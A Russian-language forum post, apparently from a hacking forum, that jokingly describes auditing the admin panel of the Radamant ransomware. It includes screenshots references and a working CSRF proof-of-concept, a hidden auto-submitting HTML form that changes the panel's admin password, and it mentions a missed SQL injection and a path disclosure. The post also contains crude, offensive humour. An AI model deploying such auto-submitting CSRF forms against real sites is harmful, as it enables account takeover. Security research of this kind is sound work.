Авторизация  
TEXHO

Криптолокер Radamant [2015]

В теме 1 сообщение

Буквально пару дней назад, стучится мне какой-то наркоман в жаббер. Говорит, мол есть у него улетная спайсуха с новейшей формулой. И формула настолько крутая, что чтобы упороться, не надо даже курить эту спайсуху, а надо только скачать файл с ней и два раза по нему кликнуть.

 

Ну я и кликнул два раза.

 

 

В общем... Прогрузили мне криптолокер, редиректнули на лендинг, где на ломаном немецком написали, что если админку на баги не проверишь, то кабздец всем твоим файлам:

 

6QD_AfzaQhas8YFRrKpcMg.png

 

А мне есть что терять... Пришлось проверять.

 

Телепатическим сигналом мне были переданы логин/пароль в админку и ссылка на сендспейс с исходниками панели. Зашел:

 

TcgSWcAHTU2et4GvQdOIqQ.png

 

Осмотрелся. Список жертв безумца, отсортированный по странам:

 

09JU-Zu5RCiHWmG06nPj1A.png

 

Список расширений файлов, который будут зашифрованы (всего - чуть больше тысячи):

 

J8x5gaiMSJKWTNpIxRnQgA.png

 

Список ботов:

 

EivLQHM7TGm-19n_HR4ouw.png

 

Инфа по отдельной жертве:

 

cMxW23-_SBaPZrkphMH8UQ.png

 

Общая статистика (к слову, могли бы объеденить с Home):

 

uwDYG6joQ3yhbd2kkGav5A.png

 

И наконец, настройки:

 

_FIdwhDUS82qR5bJFARCeA.png

 

Сразу привлекло внимание то, что для того, чтобы задать новый пароль, не нужно знать старый. Проверил - токенов никаких нет. Налицо С̶Ы̶К̶А̶ CSRF с возможностью смены пароля админа.

 

Накидал Poc:

 

Code:
<html><h1>НАША СЛУЖБА И ОПАСНА И ТРУДНА...</h1><iframe style="display:none" name="csrf-frame"></iframe><form method='POST' action='http://radomant/?setting' target="csrf-frame" id="csrf-form"><input type='hidden' name='select' value='1'><input type='hidden' name='login' value='FSB'><input type='hidden' name='password' value='1337'><input type='hidden' name='cpassword' value='1337'><input type='hidden' name='page' value='100'><input type='submit' value='submit' style="display:none"></form><script>document.getElementById("csrf-form").submit()</script></html>
Тем же способом можно сменить кошелек для выплат или произвести манипуляции с ботами (удалить бота, расшифровать файлы, сменить ключ и т.д.).

 

После этого прогнал весь код регулярками. SQL-инъекций, LFI/RFI, RCE, манипуляций с файлами - всего этого нет.

 

UPDATE. Мой фейл, проглядел sql-инъекцию (https://infoarmor.com/wp-content/upl...mant-FINAL.pdf). Помню, что смотрел на ту же самую функцию... Лохпидр.

 

Full Path Disclosure (вывод в ошибке):

 

На этих страницах бесконечный редирект:

 

Еще я не понял, что это такое:

 

ePfz1c1-TymRQJEey9aMiA.png

 

Должно быть планировалась партнерка, но ее либо не дописали, либо решили не писать. Увидеть можно это дело, если убрать все параметры из URL. Сохраняет непойми куда (http://radamant/profile/save/ - 404).

 

Вот и все.

 

P.S. Я уверен, что к моменту публикации статьи все баги будут исправлены, а ключ для расшифровки моей восьмидесятитерабайтной коллекции порнухи с карликами-осьминогами в костюмах из кожи гомо-эмо-школьников, играющих в CS с кривыми читами, которые им написал быдлокодер-аутист Анатолий, четвертый год лечащийся от алкоголизма внутривенными инъекциями мытищинского метамфетамина все таки будет получен.

 

© r00t

Поделиться сообщением


Ссылка на сообщение

Для публикации сообщений создайте учётную запись или авторизуйтесь

Вы должны быть пользователем, чтобы оставить комментарий

Создать учетную запись

Зарегистрируйте новую учётную запись в нашем сообществе. Это очень просто!

Регистрация нового пользователя

Войти

Уже есть аккаунт? Войти в систему.

Войти
Авторизация